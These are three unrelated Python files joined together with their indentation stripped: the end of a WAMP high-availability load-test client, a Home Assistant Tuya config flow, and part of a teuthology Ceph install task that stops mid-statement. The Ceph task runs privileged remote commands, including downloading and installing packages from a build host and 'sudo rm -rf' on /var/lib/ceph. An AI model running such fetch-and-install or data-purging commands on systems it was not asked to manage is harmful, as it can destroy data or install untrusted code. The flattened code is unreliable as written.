bytes_received_per_sec=bytes_received_per_sec,
events_published=self._published_cnt,
events_published_per_sec=events_published_per_sec,
bytes_published_per_sec=bytes_published_per_sec)
calls_received_per_sec = int(round(self._received_calls_cnt / batch_duration))
call_bytes_received_per_sec = int(round(self._received_calls_bytes / batch_duration))
calls_issued_per_sec = int(round(self._calls_cnt / batch_duration))
call_bytes_issued_per_sec = int(round(self._calls_bytes / batch_duration))
log('{logprefix}: {calls_received} INVOCATIONs received ({calls_received_ff} forwarded), {calls_received_per_sec}, {calls_issued} calls issued, {calls_issued_per_sec} calls/second',
logprefix=hl('WAMP {}.*'.format(self._logname), color='white', bold=True),
calls_received=self._received_calls_cnt,
calls_received_ff=self._received_calls_ff_cnt,
calls_received_per_sec=hl('{} calls/second'.format(calls_received_per_sec), color='white', bold=True),
call_bytes_received_per_sec=call_bytes_received_per_sec,
calls_issued=self._calls_cnt,
calls_issued_per_sec=calls_issued_per_sec,
call_bytes_issued_per_sec=call_bytes_issued_per_sec)
self._received_cnt = 0
self._received_bytes = 0
self._received_ff_cnt = 0
self._published_cnt = 0
self._published_bytes = 0
self._received_calls_cnt = 0
self._received_calls_bytes = 0
self._received_calls_ff_cnt = 0
self._calls_cnt = 0
self._calls_bytes = 0
self._last_stats = stats
class HATestClient(object):
def __init__(self, reactor, urls, realm, extra):
self._reactor = reactor
self._urls = urls
self._realm = realm
self._extra = extra
self._runners = {}
def start(self):
dl = []
for url in self._urls:
extra = copy.deepcopy(self._extra)
extra['url'] = url
runner = ApplicationRunner(url=url, realm=self._realm, extra=extra)
self._runners[url] = runner
d = runner.run(HATestClientSession, auto_reconnect=True, start_reactor=False, reactor=self._reactor)
dl.append(d)
return gatherResults(dl)
def stop(self):
dl = []
for runner in self._runners.values():
d = runner.stop()
dl.append(d)
return gatherResults(dl)
@inlineCallbacks
def main(reactor, config, logname, url, realm, connections, loops, rate, stride, size, period, duration, silent):
if url:
urls = [url]
else:
urls = []
for node in config.sections():
url = config[node].get('url', None)
if url:
urls.append(url)
pprint(urls)
extra = {
'period': period,
'loops': loops,
'rate': rate,
'stride': stride,
'size': size,
'silent': silent,
}
clients = []
dl = []
for i in range(connections):
_extra = copy.deepcopy(extra)
_extra['logname'] = '{}.{}'.format(logname, i)
client = HATestClient(reactor, urls, realm, _extra)
clients.append(client)
d = client.start()
dl.append(d)
yield gatherResults(dl)
yield sleep(duration)
dl = []
for client in clients:
d = client.stop()
dl.append(d)
yield gatherResults(dl)
if __name__ == '__main__':
print('Client with PID {} starting ..'.format(hl(os.getpid(), bold=True)))
parser = argparse.ArgumentParser()
parser.add_argument('-d',
'--debug',
action='store_true',
help='Enable debug output (set log level "debug").')
parser.add_argument('--config',
dest='config',
type=str,
default='client.ini',
help='Client WAMP router connections configuration.')
parser.add_argument('-s',
'--silent',
action='store_true',
help='Silent mode (set log level "warn").')
parser.add_argument('--logname',
dest='logname',
type=str,
default='client0',
                        help='Log name to use (default: "client0").')
parser.add_argument('--url',
dest='url',
type=str,
default=None,
help='The proxied router URL or None for connecting directly to nodes.')
parser.add_argument('--realm',
dest='realm',
type=str,
default="realm1",
help='The realm to join (default: "realm1").')
parser.add_argument('--connections',
dest='connections',
type=int,
default=1,
help='Number of connections to open (default: 1).')
parser.add_argument('--duration',
dest='duration',
type=int,
default=60,
help='Test duration in seconds (default: 60).')
parser.add_argument('--period',
dest='period',
type=int,
default=10,
help='Publishing session logging period in seconds (default: 10).')
parser.add_argument('--loops',
dest='loops',
type=int,
default=1,
                        help='Number of publishing loops per connection to run (default: 1).')
parser.add_argument('--rate',
dest='rate',
type=float,
default=1.,
help='Publishing (nominal) loop rate in Hz (default: 1).')
parser.add_argument('--stride',
dest='stride',
type=int,
default=1,
help='Number of events to publish per loop iteration (default: 1).')
parser.add_argument('--size',
dest='size',
type=int,
default=256,
help='Event application payload size in bytes (default: 256).')
args = parser.parse_args()
if args.silent:
txaio.start_logging(level='warn')
elif args.debug:
txaio.start_logging(level='debug')
else:
txaio.start_logging(level='info')
log = txaio.make_logger()
config = configparser.ConfigParser()
with open(args.config) as f:
config.read_file(f)
sys.exit(react(main, (config,
args.logname,
args.url,
args.realm,
args.connections,
args.loops,
args.rate,
args.stride,
args.size,
args.period,
args.duration,
args.silent)))
|
|
"""Config flow for Tuya."""
from __future__ import annotations
import logging
from typing import Any
from tuyaha import TuyaApi
from tuyaha.tuyaapi import (
TuyaAPIException,
TuyaAPIRateLimitException,
TuyaNetException,
TuyaServerException,
)
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.const import (
CONF_PASSWORD,
CONF_PLATFORM,
CONF_UNIT_OF_MEASUREMENT,
CONF_USERNAME,
ENTITY_MATCH_NONE,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
)
from homeassistant.core import callback
import homeassistant.helpers.config_validation as cv
from .const import (
CONF_BRIGHTNESS_RANGE_MODE,
CONF_COUNTRYCODE,
CONF_CURR_TEMP_DIVIDER,
CONF_DISCOVERY_INTERVAL,
CONF_MAX_KELVIN,
CONF_MAX_TEMP,
CONF_MIN_KELVIN,
CONF_MIN_TEMP,
CONF_QUERY_DEVICE,
CONF_QUERY_INTERVAL,
CONF_SET_TEMP_DIVIDED,
CONF_SUPPORT_COLOR,
CONF_TEMP_DIVIDER,
CONF_TEMP_STEP_OVERRIDE,
CONF_TUYA_MAX_COLTEMP,
DEFAULT_DISCOVERY_INTERVAL,
DEFAULT_QUERY_INTERVAL,
DEFAULT_TUYA_MAX_COLTEMP,
DOMAIN,
TUYA_DATA,
TUYA_PLATFORMS,
TUYA_TYPE_NOT_QUERY,
)
_LOGGER = logging.getLogger(__name__)
CONF_LIST_DEVICES = "list_devices"
DATA_SCHEMA_USER = vol.Schema(
{
vol.Required(CONF_USERNAME): str,
vol.Required(CONF_PASSWORD): str,
vol.Required(CONF_COUNTRYCODE): vol.Coerce(int),
vol.Required(CONF_PLATFORM): vol.In(TUYA_PLATFORMS),
}
)
ERROR_DEV_MULTI_TYPE = "dev_multi_type"
ERROR_DEV_NOT_CONFIG = "dev_not_config"
ERROR_DEV_NOT_FOUND = "dev_not_found"
RESULT_AUTH_FAILED = "invalid_auth"
RESULT_CONN_ERROR = "cannot_connect"
RESULT_SINGLE_INSTANCE = "single_instance_allowed"
RESULT_SUCCESS = "success"
RESULT_LOG_MESSAGE = {
RESULT_AUTH_FAILED: "Invalid credential",
RESULT_CONN_ERROR: "Connection error",
}
TUYA_TYPE_CONFIG = ["climate", "light"]
class TuyaConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle a tuya config flow."""
VERSION = 1
def __init__(self) -> None:
"""Initialize flow."""
self._country_code = None
self._password = None
self._platform = None
self._username = None
def _save_entry(self):
return self.async_create_entry(
title=self._username,
data={
CONF_COUNTRYCODE: self._country_code,
CONF_PASSWORD: self._password,
CONF_PLATFORM: self._platform,
CONF_USERNAME: self._username,
},
)
def _try_connect(self):
"""Try to connect and check auth."""
tuya = TuyaApi()
try:
tuya.init(
self._username, self._password, self._country_code, self._platform
)
except (TuyaAPIRateLimitException, TuyaNetException, TuyaServerException):
return RESULT_CONN_ERROR
except TuyaAPIException:
return RESULT_AUTH_FAILED
return RESULT_SUCCESS
async def async_step_user(self, user_input=None):
"""Handle a flow initialized by the user."""
if self._async_current_entries():
return self.async_abort(reason=RESULT_SINGLE_INSTANCE)
errors = {}
if user_input is not None:
self._country_code = str(user_input[CONF_COUNTRYCODE])
self._password = user_input[CONF_PASSWORD]
self._platform = user_input[CONF_PLATFORM]
self._username = user_input[CONF_USERNAME]
result = await self.hass.async_add_executor_job(self._try_connect)
if result == RESULT_SUCCESS:
return self._save_entry()
if result != RESULT_AUTH_FAILED:
return self.async_abort(reason=result)
errors["base"] = result
return self.async_show_form(
step_id="user", data_schema=DATA_SCHEMA_USER, errors=errors
)
@staticmethod
@callback
def async_get_options_flow(config_entry):
"""Get the options flow for this handler."""
return OptionsFlowHandler(config_entry)
class OptionsFlowHandler(config_entries.OptionsFlow):
"""Handle a option flow for Tuya."""
def __init__(self, config_entry: config_entries.ConfigEntry) -> None:
"""Initialize options flow."""
self.config_entry = config_entry
self._conf_devs_id = None
self._conf_devs_option: dict[str, Any] = {}
self._form_error = None
def _get_form_error(self):
"""Set the error to be shown in the options form."""
errors = {}
if self._form_error:
errors["base"] = self._form_error
self._form_error = None
return errors
def _get_tuya_devices_filtered(self, types, exclude_mode=False, type_prefix=True):
"""Get the list of Tuya device to filtered by types."""
config_list = {}
types_filter = set(types)
tuya = self.hass.data[DOMAIN][TUYA_DATA]
devices_list = tuya.get_all_devices()
for device in devices_list:
dev_type = device.device_type()
exclude = (
dev_type in types_filter
if exclude_mode
else dev_type not in types_filter
)
if exclude:
continue
dev_id = device.object_id()
if type_prefix:
dev_id = f"{dev_type}-{dev_id}"
config_list[dev_id] = f"{device.name()} ({dev_type})"
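        # e.g. with type_prefix=True an entry looks like
        # {'light-<object_id>': '<device name> (light)'}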
return config_list
def _get_device(self, dev_id):
"""Get specific device from tuya library."""
tuya = self.hass.data[DOMAIN][TUYA_DATA]
return tuya.get_device_by_id(dev_id)
def _save_config(self, data):
"""Save the updated options."""
curr_conf = self.config_entry.options.copy()
curr_conf.update(data)
curr_conf.update(self._conf_devs_option)
return self.async_create_entry(title="", data=curr_conf)
async def _async_device_form(self, devs_id):
"""Return configuration form for devices."""
conf_devs_id = []
for count, dev_id in enumerate(devs_id):
device_info = dev_id.split("-")
if count == 0:
device_type = device_info[0]
device_id = device_info[1]
elif device_type != device_info[0]:
self._form_error = ERROR_DEV_MULTI_TYPE
return await self.async_step_init()
conf_devs_id.append(device_info[1])
device = self._get_device(device_id)
if not device:
self._form_error = ERROR_DEV_NOT_FOUND
return await self.async_step_init()
curr_conf = self._conf_devs_option.get(
device_id, self.config_entry.options.get(device_id, {})
)
config_schema = self._get_device_schema(device_type, curr_conf, device)
if not config_schema:
self._form_error = ERROR_DEV_NOT_CONFIG
return await self.async_step_init()
self._conf_devs_id = conf_devs_id
device_name = (
"(multiple devices selected)" if len(conf_devs_id) > 1 else device.name()
)
return self.async_show_form(
step_id="device",
data_schema=config_schema,
description_placeholders={
"device_type": device_type,
"device_name": device_name,
},
)
async def async_step_init(self, user_input=None):
"""Handle options flow."""
if self.config_entry.state is not config_entries.ConfigEntryState.LOADED:
_LOGGER.error("Tuya integration not yet loaded")
return self.async_abort(reason=RESULT_CONN_ERROR)
if user_input is not None:
dev_ids = user_input.get(CONF_LIST_DEVICES)
if dev_ids:
return await self.async_step_device(None, dev_ids)
user_input.pop(CONF_LIST_DEVICES, [])
return self._save_config(data=user_input)
data_schema = vol.Schema(
{
vol.Optional(
CONF_DISCOVERY_INTERVAL,
default=self.config_entry.options.get(
CONF_DISCOVERY_INTERVAL, DEFAULT_DISCOVERY_INTERVAL
),
): vol.All(vol.Coerce(int), vol.Clamp(min=30, max=900)),
}
)
query_devices = self._get_tuya_devices_filtered(
TUYA_TYPE_NOT_QUERY, True, False
)
if query_devices:
devices = {ENTITY_MATCH_NONE: "Default"}
devices.update(query_devices)
def_val = self.config_entry.options.get(CONF_QUERY_DEVICE)
if not def_val or not query_devices.get(def_val):
def_val = ENTITY_MATCH_NONE
data_schema = data_schema.extend(
{
vol.Optional(
CONF_QUERY_INTERVAL,
default=self.config_entry.options.get(
CONF_QUERY_INTERVAL, DEFAULT_QUERY_INTERVAL
),
): vol.All(vol.Coerce(int), vol.Clamp(min=30, max=240)),
vol.Optional(CONF_QUERY_DEVICE, default=def_val): vol.In(devices),
}
)
config_devices = self._get_tuya_devices_filtered(TUYA_TYPE_CONFIG, False, True)
if config_devices:
data_schema = data_schema.extend(
{vol.Optional(CONF_LIST_DEVICES): cv.multi_select(config_devices)}
)
return self.async_show_form(
step_id="init",
data_schema=data_schema,
errors=self._get_form_error(),
)
async def async_step_device(self, user_input=None, dev_ids=None):
"""Handle options flow for device."""
if dev_ids is not None:
return await self._async_device_form(dev_ids)
if user_input is not None:
for device_id in self._conf_devs_id:
self._conf_devs_option[device_id] = user_input
return await self.async_step_init()
def _get_device_schema(self, device_type, curr_conf, device):
"""Return option schema for device."""
if device_type != device.device_type():
return None
schema = None
if device_type == "light":
schema = self._get_light_schema(curr_conf, device)
elif device_type == "climate":
schema = self._get_climate_schema(curr_conf, device)
return schema
@staticmethod
def _get_light_schema(curr_conf, device):
"""Create option schema for light device."""
min_kelvin = device.max_color_temp()
max_kelvin = device.min_color_temp()
config_schema = vol.Schema(
{
vol.Optional(
CONF_SUPPORT_COLOR,
default=curr_conf.get(CONF_SUPPORT_COLOR, False),
): bool,
vol.Optional(
CONF_BRIGHTNESS_RANGE_MODE,
default=curr_conf.get(CONF_BRIGHTNESS_RANGE_MODE, 0),
): vol.In({0: "Range 1-255", 1: "Range 10-1000"}),
vol.Optional(
CONF_MIN_KELVIN,
default=curr_conf.get(CONF_MIN_KELVIN, min_kelvin),
): vol.All(vol.Coerce(int), vol.Clamp(min=min_kelvin, max=max_kelvin)),
vol.Optional(
CONF_MAX_KELVIN,
default=curr_conf.get(CONF_MAX_KELVIN, max_kelvin),
): vol.All(vol.Coerce(int), vol.Clamp(min=min_kelvin, max=max_kelvin)),
vol.Optional(
CONF_TUYA_MAX_COLTEMP,
default=curr_conf.get(
CONF_TUYA_MAX_COLTEMP, DEFAULT_TUYA_MAX_COLTEMP
),
): vol.All(
vol.Coerce(int),
vol.Clamp(
min=DEFAULT_TUYA_MAX_COLTEMP, max=DEFAULT_TUYA_MAX_COLTEMP * 10
),
),
}
)
return config_schema
@staticmethod
def _get_climate_schema(curr_conf, device):
"""Create option schema for climate device."""
unit = device.temperature_unit()
def_unit = TEMP_FAHRENHEIT if unit == "FAHRENHEIT" else TEMP_CELSIUS
supported_steps = device.supported_temperature_steps()
default_step = device.target_temperature_step()
config_schema = vol.Schema(
{
vol.Optional(
CONF_UNIT_OF_MEASUREMENT,
default=curr_conf.get(CONF_UNIT_OF_MEASUREMENT, def_unit),
): vol.In({TEMP_CELSIUS: "Celsius", TEMP_FAHRENHEIT: "Fahrenheit"}),
vol.Optional(
CONF_TEMP_DIVIDER,
default=curr_conf.get(CONF_TEMP_DIVIDER, 0),
): vol.All(vol.Coerce(int), vol.Clamp(min=0)),
vol.Optional(
CONF_CURR_TEMP_DIVIDER,
default=curr_conf.get(CONF_CURR_TEMP_DIVIDER, 0),
): vol.All(vol.Coerce(int), vol.Clamp(min=0)),
vol.Optional(
CONF_SET_TEMP_DIVIDED,
default=curr_conf.get(CONF_SET_TEMP_DIVIDED, True),
): bool,
vol.Optional(
CONF_TEMP_STEP_OVERRIDE,
default=curr_conf.get(CONF_TEMP_STEP_OVERRIDE, default_step),
): vol.In(supported_steps),
vol.Optional(
CONF_MIN_TEMP,
default=curr_conf.get(CONF_MIN_TEMP, 0),
): int,
vol.Optional(
CONF_MAX_TEMP,
default=curr_conf.get(CONF_MAX_TEMP, 0),
): int,
}
)
return config_schema
|
|
from cStringIO import StringIO
import contextlib
import copy
import logging
import time
import os
import subprocess
from teuthology.config import config as teuth_config
from teuthology import misc as teuthology
from teuthology import contextutil, packaging
from teuthology.exceptions import VersionNotFoundError
from teuthology.parallel import parallel
from ..orchestra import run
log = logging.getLogger(__name__)
# Should the RELEASE value get extracted from somewhere?
RELEASE = "1-0"
# This is intended to be a complete listing of ceph packages. If we're going
# to hardcode this stuff, I don't want to do it in more than one place.
PACKAGES = {}
PACKAGES['ceph'] = {}
PACKAGES['ceph']['deb'] = [
'ceph',
# 'ceph-dbg',
'ceph-mds',
# 'ceph-mds-dbg',
'ceph-common',
# 'ceph-common-dbg',
'ceph-fuse',
# 'ceph-fuse-dbg',
'ceph-test',
# 'ceph-test-dbg',
'radosgw',
# 'radosgw-dbg',
'python-ceph',
'libcephfs1',
# 'libcephfs1-dbg',
'libcephfs-java',
'libcephfs-jni',
'librados2',
# 'librados2-dbg',
'librbd1',
# 'librbd1-dbg',
'rbd-fuse',
'qemu',
]
PACKAGES['ceph']['rpm'] = [
# 'ceph-debuginfo',
'ceph-radosgw',
'ceph-test',
'ceph-devel',
'ceph',
'ceph-fuse',
'cephfs-java',
'rest-bench',
'libcephfs_jni1',
'libcephfs1',
'librados2',
'librbd1',
'python-ceph',
'rbd-fuse',
'qemu',
]
def _get_config_value_for_remote(ctx, remote, config, key):
"""
Look through config, and attempt to determine the "best" value to use for a
given key. For example, given:
config = {
'all':
{'branch': 'master'},
'branch': 'next'
}
_get_config_value_for_remote(ctx, remote, config, 'branch')
would return 'master'.
:param ctx: the argparse.Namespace object
:param remote: the teuthology.orchestra.remote.Remote object
:param config: the config dict
:param key: the name of the value to retrieve
"""
roles = ctx.cluster.remotes[remote]
if 'all' in config:
return config['all'].get(key)
elif roles:
for role in roles:
if role in config and key in config[role]:
return config[role].get(key)
return config.get(key)
def _get_uri(tag, branch, sha1):
"""
Set the uri -- common code used by both install and debian upgrade
"""
uri = None
if tag:
uri = 'ref/' + tag
elif branch:
uri = 'ref/' + branch
elif sha1:
uri = 'sha1/' + sha1
else:
# FIXME: Should master be the default?
log.debug("defaulting to master branch")
uri = 'ref/master'
return uri
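# For instance, _get_uri(None, 'next', None) returns 'ref/next', and
# _get_uri(None, None, 'd5aa3a9') returns 'sha1/d5aa3a9'.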
def _get_baseurlinfo_and_dist(ctx, remote, config):
"""
Through various commands executed on the remote, determines the
distribution name and version in use, as well as the portion of the repo
URI to use to specify which version of the project (normally ceph) to
    install. Example:
{'arch': 'x86_64',
'dist': 'raring',
'dist_release': None,
'distro': 'Ubuntu',
'distro_release': None,
'flavor': 'basic',
'relval': '13.04',
'uri': 'ref/master'}
:param ctx: the argparse.Namespace object
:param remote: the teuthology.orchestra.remote.Remote object
:param config: the config dict
:returns: dict -- the information you want.
"""
retval = {}
relval = None
r = remote.run(
args=['arch'],
stdout=StringIO(),
)
retval['arch'] = r.stdout.getvalue().strip()
r = remote.run(
args=['lsb_release', '-is'],
stdout=StringIO(),
)
retval['distro'] = r.stdout.getvalue().strip()
r = remote.run(
args=[
'lsb_release', '-rs'], stdout=StringIO())
retval['relval'] = r.stdout.getvalue().strip()
dist_name = None
if retval['distro'] == 'CentOS':
relval = retval['relval']
relval = relval[0:relval.find('.')]
distri = 'centos'
retval['distro_release'] = '%s%s' % (distri, relval)
retval['dist'] = retval['distro_release']
dist_name = 'el'
retval['dist_release'] = '%s%s' % (dist_name, relval)
elif retval['distro'] == 'RedHatEnterpriseServer':
relval = retval['relval'].replace('.', '_')
distri = 'rhel'
retval['distro_release'] = '%s%s' % (distri, relval)
retval['dist'] = retval['distro_release']
dist_name = 'el'
short_relval = relval[0:relval.find('_')]
retval['dist_release'] = '%s%s' % (dist_name, short_relval)
elif retval['distro'] == 'Fedora':
distri = retval['distro']
dist_name = 'fc'
retval['distro_release'] = '%s%s' % (dist_name, retval['relval'])
retval['dist'] = retval['dist_release'] = retval['distro_release']
else:
r = remote.run(
args=['lsb_release', '-sc'],
stdout=StringIO(),
)
retval['dist'] = r.stdout.getvalue().strip()
retval['distro_release'] = None
retval['dist_release'] = None
# branch/tag/sha1 flavor
retval['flavor'] = config.get('flavor', 'basic')
log.info('config is %s', config)
tag = _get_config_value_for_remote(ctx, remote, config, 'tag')
branch = _get_config_value_for_remote(ctx, remote, config, 'branch')
sha1 = _get_config_value_for_remote(ctx, remote, config, 'sha1')
uri = _get_uri(tag, branch, sha1)
retval['uri'] = uri
return retval
def _get_baseurl(ctx, remote, config):
"""
Figures out which package repo base URL to use.
Example:
'http://gitbuilder.ceph.com/ceph-deb-raring-x86_64-basic/ref/master'
:param ctx: the argparse.Namespace object
:param remote: the teuthology.orchestra.remote.Remote object
:param config: the config dict
:returns: str -- the URL
"""
# get distro name and arch
baseparms = _get_baseurlinfo_and_dist(ctx, remote, config)
base_url = 'http://{host}/{proj}-{pkg_type}-{dist}-{arch}-{flavor}/{uri}'.format(
host=teuth_config.gitbuilder_host,
proj=config.get('project', 'ceph'),
pkg_type=remote.system_type,
**baseparms
)
return base_url
def _block_looking_for_package_version(remote, base_url, wait=False):
"""
Look for, and parse, a file called 'version' in base_url.
:param remote: the teuthology.orchestra.remote.Remote object
:param wait: wait forever for the file to show up. (default False)
:returns: str -- the version e.g. '0.67-240-g67a95b9-1raring'
:raises: VersionNotFoundError
"""
while True:
r = remote.run(
args=['wget', '-q', '-O-', base_url + '/version'],
stdout=StringIO(),
check_status=False,
)
if r.exitstatus != 0:
if wait:
log.info('Package not there yet, waiting...')
time.sleep(15)
continue
raise VersionNotFoundError(base_url)
break
version = r.stdout.getvalue().strip()
    # FIXME: 'version' as retrieved from the repo is actually the RPM version
# PLUS *part* of the release. Example:
# Right now, ceph master is given the following version in the repo file:
# v0.67-rc3.164.gd5aa3a9 - whereas in reality the RPM version is 0.61.7
# and the release is 37.g1243c97.el6 (for centos6).
# Point being, I have to mangle a little here.
if version[0] == 'v':
version = version[1:]
if '-' in version:
version = version.split('-')[0]
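    # e.g. 'v0.67-rc3.164.gd5aa3a9' becomes '0.67': the leading 'v' is
    # stripped and everything from the first '-' onward is dropped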
return version
def _get_local_dir(config, remote):
"""
Extract local directory name from the task lists.
Copy files over to the remote site.
"""
ldir = config.get('local', None)
if ldir:
remote.run(args=['sudo', 'mkdir', '-p', ldir,])
for fyle in os.listdir(ldir):
fname = "%s/%s" % (ldir, fyle)
teuthology.sudo_write_file(remote, fname, open(fname).read(), '644')
return ldir
def _update_deb_package_list_and_install(ctx, remote, debs, config):
"""
Runs ``apt-get update`` first, then runs ``apt-get install``, installing
the requested packages on the remote system.
TODO: split this into at least two functions.
:param ctx: the argparse.Namespace object
:param remote: the teuthology.orchestra.remote.Remote object
:param debs: list of packages names to install
:param config: the config dict
"""
# # check for ceph release key
# r = remote.run(
# args=[
# 'sudo', 'apt-key', 'list', run.Raw('|'), 'grep', 'Ceph',
# ],
# stdout=StringIO(),
# check_status=False,
# )
# if r.stdout.getvalue().find('Ceph automated package') == -1:
# # if it doesn't exist, add it
# remote.run(
# args=[
# 'wget', '-q', '-O-',
# 'https://ceph.com/git/?p=ceph.git;a=blob_plain;f=keys/autobuild.asc',
# run.Raw('|'),
# 'sudo', 'apt-key', 'add', '-',
# ],
# stdout=StringIO(),
# )
#
# baseparms = _get_baseurlinfo_and_dist(ctx, remote, config)
# log.info("Installing packages: {pkglist} on remote deb {arch}".format(
# pkglist=", ".join(debs), arch=baseparms['arch'])
# )
# # get baseurl
# base_url = _get_baseurl(ctx, remote, config)
# log.info('Pulling from %s', base_url)
#
# # get package version string
# # FIXME this is a terrible hack.
# while True:
# r = remote.run(
# args=[
# 'wget', '-q', '-O-', base_url + '/version',
# ],
# stdout=StringIO(),
# check_status=False,
# )
# if r.exitstatus != 0:
# if config.get('wait_for_package'):
# log.info('Package not there yet, waiting...')
# time.sleep(15)
# continue
# raise VersionNotFoundError("%s/version" % base_url)
# version = r.stdout.getvalue().strip()
# log.info('Package version is %s', version)
# break
#
# remote.run(
# args=[
# 'echo', 'deb', base_url, baseparms['dist'], 'main',
# run.Raw('|'),
# 'sudo', 'tee', '/etc/apt/sources.list.d/{proj}.list'.format(
# proj=config.get('project', 'ceph')),
# ],
# stdout=StringIO(),
# )
remote.run(args=['sudo', 'apt-get', 'update'], check_status=False)
remote.run(
args=[
'sudo', 'DEBIAN_FRONTEND=noninteractive', 'apt-get', '-y', '--force-yes',
'-o', run.Raw('Dpkg::Options::="--force-confdef"'), '-o', run.Raw(
'Dpkg::Options::="--force-confold"'),
'install',
] + ['%s' % (d) for d in debs],
)
# ldir = _get_local_dir(config, remote)
# if ldir:
# for fyle in os.listdir(ldir):
# fname = "%s/%s" % (ldir, fyle)
# remote.run(args=['sudo', 'dpkg', '-i', fname],)
#
def _yum_fix_repo_priority(remote, project, uri):
"""
    On the remote, add 'priority=1' lines to each enabled repo in:
    /etc/yum.repos.d/{project}.repo
    :param remote: the teuthology.orchestra.remote.Remote object
    :param project: the project whose repos need modification
    :param uri: the repo URI portion substituted into the baseurls
"""
repo_path = '/etc/yum.repos.d/%s.repo' % project
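    # The first sed expression slurps the whole file (':a;N;$!ba') and inserts
    # a 'priority=1' line between each 'enabled=1' line and the 'gpg' line
    # that follows it; the second rewrites any 'ref/<name>/' in the repo
    # baseurls to the given uri.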
remote.run(
args=[
'if', 'test', '-f', repo_path, run.Raw(';'), 'then',
'sudo', 'sed', '-i', '-e',
run.Raw('\':a;N;$!ba;s/enabled=1\\ngpg/enabled=1\\npriority=1\\ngpg/g\''),
'-e',
run.Raw("'s;ref/[a-zA-Z0-9_-]*/;{uri}/;g'".format(uri=uri)),
repo_path, run.Raw(';'), 'fi'
]
)
def _yum_fix_repo_host(remote, project):
"""
Update the hostname to reflect the gitbuilder_host setting.
"""
old_host = teuth_config._defaults['gitbuilder_host']
new_host = teuth_config.gitbuilder_host
if new_host == old_host:
return
repo_path = '/etc/yum.repos.d/%s.repo' % project
host_sed_expr = "'s/{0}/{1}/'".format(old_host, new_host)
remote.run(
args=[
'if', 'test', '-f', repo_path, run.Raw(';'), 'then',
'sudo', 'sed', '-i', '-e', run.Raw(host_sed_expr),
repo_path, run.Raw(';'), 'fi']
)
def _yum_set_check_obsoletes(remote):
"""
Set check_obsoletes = 1 in /etc/yum/pluginconf.d/priorities.conf
Creates a backup at /etc/yum/pluginconf.d/priorities.conf.orig so we can
restore later.
"""
conf_path = '/etc/yum/pluginconf.d/priorities.conf'
conf_path_orig = conf_path + '.orig'
remote.run(args=['sudo', 'cp', '-af', conf_path, conf_path_orig])
remote.run(args=['echo', 'check_obsoletes = 1', run.Raw('|'),
'sudo', 'tee', '-a', conf_path])
def _yum_unset_check_obsoletes(remote):
"""
Restore the /etc/yum/pluginconf.d/priorities.conf backup
"""
conf_path = '/etc/yum/pluginconf.d/priorities.conf'
conf_path_orig = conf_path + '.orig'
remote.run(args=['sudo', 'mv', '-f', conf_path_orig, conf_path],
check_status=False)
def _update_rpm_package_list_and_install(ctx, remote, rpm, config):
"""
Installs the ceph-release package for the relevant branch, then installs
the requested packages on the remote system.
TODO: split this into at least two functions.
:param ctx: the argparse.Namespace object
:param remote: the teuthology.orchestra.remote.Remote object
:param rpm: list of packages names to install
:param config: the config dict
"""
baseparms = _get_baseurlinfo_and_dist(ctx, remote, config)
log.info("Installing packages: {pkglist} on remote rpm {arch}".format(
pkglist=", ".join(rpm), arch=baseparms['arch']))
host = teuth_config.gitbuilder_host
dist_release = baseparms['dist_release']
project = config.get('project', 'ceph')
start_of_url = 'http://{host}/{proj}-rpm-{distro_release}-{arch}-{flavor}/{uri}'.format(
proj=project, host=host, **baseparms)
proj_release = '{proj}-release-{release}.{dist_release}.noarch'.format(
proj=project, release=RELEASE, dist_release=dist_release)
rpm_name = "{rpm_nm}.rpm".format(rpm_nm=proj_release)
base_url = "{start_of_url}/noarch/{rpm_name}".format(
start_of_url=start_of_url, rpm_name=rpm_name)
    # When this was one command with a pipe, it would sometimes
    # fail with the message 'rpm: no packages given for install',
    # so fetch the rpm first, then install it from the local file.
    remote.run(args=['wget', base_url])
    remote.run(args=['sudo', 'yum', '-y', 'localinstall', rpm_name])
    remote.run(args=['rm', '-f', rpm_name])
uri = baseparms['uri']
#_yum_fix_repo_priority(remote, project, uri)
#_yum_fix_repo_host(remote, project)
#_yum_set_check_obsoletes(remote)
remote.run(
args=[
'sudo', 'yum', 'clean', 'all',
])
ldir = _get_local_dir(config, remote)
for cpack in rpm:
pkg = None
if ldir:
pkg = "{ldir}/{cpack}".format(
ldir=ldir,
cpack=cpack,
)
remote.run(
args = ['if', 'test', '-e',
run.Raw(pkg), run.Raw(';'), 'then',
'sudo', 'yum', 'remove', pkg, '-y', run.Raw(';'),
'sudo', 'yum', 'install', pkg, '-y',
run.Raw(';'), 'fi']
)
if pkg is None:
remote.run(args=['sudo', 'yum', 'install', cpack, '-y'])
else:
remote.run(
args = ['if', 'test', run.Raw('!'), '-e',
run.Raw(pkg), run.Raw(';'), 'then',
'sudo', 'yum', 'install', cpack, '-y',
run.Raw(';'), 'fi'])
def verify_package_version(ctx, config, remote):
"""
Ensures that the version of package installed is what
was asked for in the config.
For most cases this is for ceph, but we also install samba
for example.
"""
# Do not verify the version if the ceph-deploy task is being used to
# install ceph. Verifying the ceph installed by ceph-deploy should work,
    # but the qa suites will need to be reorganized first to run ceph-deploy
# before the install task.
# see: http://tracker.ceph.com/issues/11248
if config.get("extras"):
log.info("Skipping version verification...")
return True
base_url = _get_baseurl(ctx, remote, config)
version = _block_looking_for_package_version(
remote,
base_url,
config.get('wait_for_package', False)
)
pkg_to_check = config.get('project', 'ceph')
installed_ver = packaging.get_package_version(remote, pkg_to_check)
if installed_ver and version in installed_ver:
msg = "The correct {pkg} version {ver} is installed.".format(
ver=version,
pkg=pkg_to_check
)
log.info(msg)
else:
raise RuntimeError(
"{pkg} version {ver} was not installed, found {installed}.".format(
ver=version,
installed=installed_ver,
pkg=pkg_to_check
)
)
def purge_data(ctx):
"""
Purge /var/lib/ceph on every remote in ctx.
:param ctx: the argparse.Namespace object
"""
with parallel() as p:
for remote in ctx.cluster.remotes.iterkeys():
p.spawn(_purge_data, remote)
def _purge_data(remote):
"""
Purge /var/lib/ceph on remote.
:param remote: the teuthology.orchestra.remote.Remote object
"""
log.info('Purging /var/lib/ceph on %s', remote)
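    # Roughly the following shell pipeline, expressed as run() args:
    #   sudo rm -rf --one-file-system -- /var/lib/ceph || true ;
    #   test -d /var/lib/ceph && \
    #       sudo find /var/lib/ceph -mindepth 1 -maxdepth 2 -type d \
    #           -exec umount {} ';' ;
    #   sudo rm -rf --one-file-system -- /var/lib/ceph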
remote.run(args=[
'sudo',
'rm', '-rf', '--one-file-system', '--', '/var/lib/ceph',
run.Raw('||'),
'true',
run.Raw(';'),
